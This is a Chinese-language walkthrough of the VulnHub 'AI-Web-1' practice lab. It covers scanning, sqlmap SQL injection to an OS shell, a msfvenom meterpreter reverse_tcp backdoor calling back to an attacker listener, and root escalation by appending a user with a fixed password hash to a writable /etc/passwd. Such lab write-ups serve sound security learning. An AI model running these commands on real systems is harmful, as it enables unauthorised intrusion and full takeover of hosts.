简单打靶场之AI_WEB_1
字数 743 2025-08-12 11:34:27

AI_WEB_1 靶场渗透教学文档

0x01 靶场搭建

  1. 下载靶场环境:
    • 下载地址:https://www.vulnhub.com/entry/ai-web-1,353/
    • 解压后使用虚拟机软件打开

0x02 信息收集

主机发现

  1. 使用Metasploit的ARP扫描模块探测存活主机:

    msfconsole
    use auxiliary/scanner/discovery/arp_sweep
    set RHOSTS 192.168.91.0/24
    set THREADS 30
    run
    
  2. 使用Nmap扫描目标主机端口:

    nmap -T4 -sC -sV -p- 192.168.91.132
    
  3. 使用fscan进行全面扫描:

    fscan32.exe -h 192.168.91.132
    

Web目录扫描

  1. 使用dirsearch扫描Web目录:

    python dirsearch.py -u http://192.168.91.132/
    
  2. 发现重要目录:

    • robots.txt
    • /se3reTdir777/ (可访问)
    • 其他目录返回403禁止访问

0x03 SQL注入利用

  1. 发现/se3reTdir777/存在SQL注入漏洞

  2. 使用sqlmap进行自动化测试:

    python sqlmap.py -r test.txt --batch --level 3
    
  3. 获取网站绝对路径:

    • 通过访问/robots.txt中的另一个目录(如info.php)获取
    • 示例路径:/home/www/html/web1x443290o2sdf92213/m3diNf0/info.php
  4. 获取交互式shell:

    python sqlmap.py -r test.txt --os-shell
    

0x04 后门上传与利用

  1. 使用msfvenom生成Linux后门:

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.91.139 LPORT=4444 -f elf > shell.elf
    
  2. 设置Metasploit监听:

    msfconsole
    use exploit/multi/handler
    set PAYLOAD linux/x86/meterpreter/reverse_tcp
    set LHOST 192.168.91.139
    set LPORT 4444
    run
    
  3. 通过Web执行命令上传并运行后门:

    cmd=chmod 777 shell.elf
    cmd=./shell.elf
    

0x05 权限提升

自动提权检测

  1. 使用Metasploit的本地提权建议模块:
    meterpreter > run post/multi/recon/local_exploit_suggester
    

手动提权方法

  1. 查找SUID文件:

    find / -perm -u=s -type f 2>/dev/null
    
  2. 查找可写文件/目录:

    find / -writable -type d 2>/dev/null  # 文件夹
    find / -writable -type f 2>/dev/null  # 文件
    
  3. 发现/etc/passwd可写时的提权方法:

    • 生成加密密码:
      perl -le 'print crypt("123.com","salt")'
      
    • 添加特权用户:
      echo "testsec:sarxjaiixejOU:0:0:hacker:/root:/bin/bash" >> /etc/passwd
      
    • 验证添加:
      cat /etc/passwd | grep testsec
      

0x06 总结

  1. 渗透测试关键步骤:

    • 信息收集 → 漏洞发现 → 漏洞利用 → 权限提升 → 维持访问
  2. 提权方法多样,当一种方法失败时应尝试其他途径

  3. 本靶场涉及的主要技术点:

    • ARP扫描
    • 目录爆破
    • SQL注入利用
    • Web后门上传
    • 多种提权技术(SUID、可写文件等)
AI_ WEB_ 1 靶场渗透教学文档 0x01 靶场搭建 下载靶场环境: 下载地址:https://www.vulnhub.com/entry/ai-web-1,353/ 解压后使用虚拟机软件打开 0x02 信息收集 主机发现 使用Metasploit的ARP扫描模块探测存活主机: 使用Nmap扫描目标主机端口: 使用fscan进行全面扫描: Web目录扫描 使用dirsearch扫描Web目录: 发现重要目录: robots.txt /se3reTdir777/ (可访问) 其他目录返回403禁止访问 0x03 SQL注入利用 发现/se3reTdir777/存在SQL注入漏洞 使用sqlmap进行自动化测试: 获取网站绝对路径: 通过访问/robots.txt中的另一个目录(如info.php)获取 示例路径:/home/www/html/web1x443290o2sdf92213/m3diNf0/info.php 获取交互式shell: 0x04 后门上传与利用 使用msfvenom生成Linux后门: 设置Metasploit监听: 通过Web执行命令上传并运行后门: 0x05 权限提升 自动提权检测 使用Metasploit的本地提权建议模块: 手动提权方法 查找SUID文件: 查找可写文件/目录: 发现/etc/passwd可写时的提权方法: 生成加密密码: 添加特权用户: 验证添加: 0x06 总结 渗透测试关键步骤: 信息收集 → 漏洞发现 → 漏洞利用 → 权限提升 → 维持访问 提权方法多样,当一种方法失败时应尝试其他途径 本靶场涉及的主要技术点: ARP扫描 目录爆破 SQL注入利用 Web后门上传 多种提权技术(SUID、可写文件等)